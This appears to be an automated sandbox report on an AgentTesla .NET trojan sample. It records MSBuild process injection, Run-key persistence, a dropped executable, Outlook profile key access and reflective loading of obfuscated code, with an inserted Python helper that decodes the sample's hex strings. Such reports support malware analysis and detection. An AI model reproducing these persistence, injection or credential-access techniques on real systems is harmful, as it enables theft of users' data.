                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.325563619.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Binary or memory string: OriginalFilenameGeneric.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe 2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | ReversingLabs: Detection: 26%
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.log
                    Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/CommandLine/OutOfProcTaskHostNode.cs | Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/TaskParameter.cs | Task registration methods: 'CreateNewTaskItemFrom'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/TaskLoader.cs | Task registration methods: 'CreateTask'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/RegisteredTaskObjectCacheBase.cs | Task registration methods: '.cctor', 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', '.ctor', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.cs | Security API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_01
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Mutant created: \Sessions\1\BaseNamedObjects\mwyLJQTCzoERzESbkqhGjwVkw
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: l+C:\Users\user\AppData\Roaming\ykVBUY\*.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361159926.0000000000B93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                    Source: ykVBUY.exe, 00000010.00000002.380916358.0000000000E42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *.slnP#
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe.9.dr | Binary or memory string: *.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: MSBuild MyApp.csproj /t:Clean
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: /ignoreprojectextensions:.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr | Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb | source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD | source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

                    Data Obfuscation

                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs | .Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_07CA3619 push ebx; retf 0_2_07CA3620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067DA472 push 8BFFFFFFh; retf 9_2_067DA480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D18F7 push es; ret 9_2_067D1910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D18AB push es; ret 9_2_067D18C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D2177 push edi; retn 0000h 9_2_067D2179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067FDA32 push eax; iretd 9_2_067FDA39
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5EFD push es; ret 9_2_067F5F34
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5F7F push es; ret 9_2_067F5F84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FDF push es; ret 9_2_067F5FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FD7 push es; ret 9_2_067F5FD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FC7 push es; ret 9_2_067F5FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FBF push es; ret 9_2_067F5FC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FB7 push es; ret 9_2_067F5FB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5F8F push es; ret 9_2_067F5F90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6077 push es; ret 9_2_067F6078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F606F push es; ret 9_2_067F6070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6067 push es; ret 9_2_067F6068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F605F push es; ret 9_2_067F6060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6057 push es; ret 9_2_067F6058
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F604F push es; ret 9_2_067F6050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6027 push es; ret 9_2_067F6028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60FF push es; ret 9_2_067F6100
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60F7 push es; ret 9_2_067F60F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60EF push es; ret 9_2_067F60F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60E7 push es; ret 9_2_067F60E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60BF push es; ret 9_2_067F60C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60B7 push es; ret 9_2_067F60B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60AF push es; ret 9_2_067F60B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60A7 push es; ret 9_2_067F60A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F609F push es; ret 9_2_067F60A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F610F push es; ret 9_2_067F6110
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: 0xCED63224 [Mon Dec 18 16:53:56 2079 UTC] (a compile timestamp in the future cannot be a genuine build time)
                    Source: initial sample | Static PE information: section name: .text entropy: 7.97974117818 (close to the 8.0 maximum, consistent with packed or encrypted content)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY
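The two LateCall arguments quoted in the .Net Code entries at the top of this section are plain hex-encoded ASCII, which is why a decompiler shows them as opaque digit strings. The Python below is an added triage helper, not code from the report or from the sample: it decodes such literals and flags the pairing of AppDomain::Load(byte[]) with a late-bound "Invoke" that marks an in-memory loader. The two report fragments are embedded as constructed input; what the decoded names refer to inside the loaded assembly is an assumption the report does not confirm.

```python
import re

# Constructed input: the two decompiled .Net Code fragments quoted in the report above.
SAMPLE_LINES = [
    "System.Reflection.Assembly System.AppDomain::Load(System.Byte[])",
    'LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { '
    '"4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)',
]

# A quoted literal made only of hex digit pairs, at least four bytes long.
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')


def decode_hex_literal(token):
    """Return the printable ASCII behind a hex literal, or None if it is not text."""
    try:
        raw = bytes.fromhex(token)
    except ValueError:
        return None
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def decode_hex_strings(line):
    """All (hex literal, decoded text) pairs found in one decompiled line."""
    found = []
    for token in HEX_LITERAL.findall(line):
        text = decode_hex_literal(token)
        if text is not None:
            found.append((token, text))
    return found


def triage(lines):
    """Summarise loader indicators across a set of decompiled lines."""
    report = {"reflective_load": False, "late_bound_invoke": False, "decoded": []}
    for line in lines:
        # Assembly loaded from a byte array rather than from disk: the payload
        # never exists as a file, so disk-based scanning does not see it.
        if "AppDomain::Load(System.Byte[])" in line or "Assembly::Load(System.Byte[])" in line:
            report["reflective_load"] = True
        # VB.NET late binding used to call "Invoke" by name hides the target
        # method from static cross-references.
        if "LateBinding.LateCall(" in line and '"Invoke"' in line:
            report["late_bound_invoke"] = True
        report["decoded"].extend(decode_hex_strings(line))
    return report


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for token, text in result["decoded"]:
        print(f"{token} -> {text}")
    print("reflective load:", result["reflective_load"], "| late-bound Invoke:", result["late_bound_invoke"])
```

Decoded, the literals read AsymmetricKeyExchangeFormat and ibokFBi. Since the sample loads an assembly from a byte array and then invokes something on it by name, these are most plausibly the type or member names it resolves via reflection; that reading is an inference, not a finding the report states.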

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
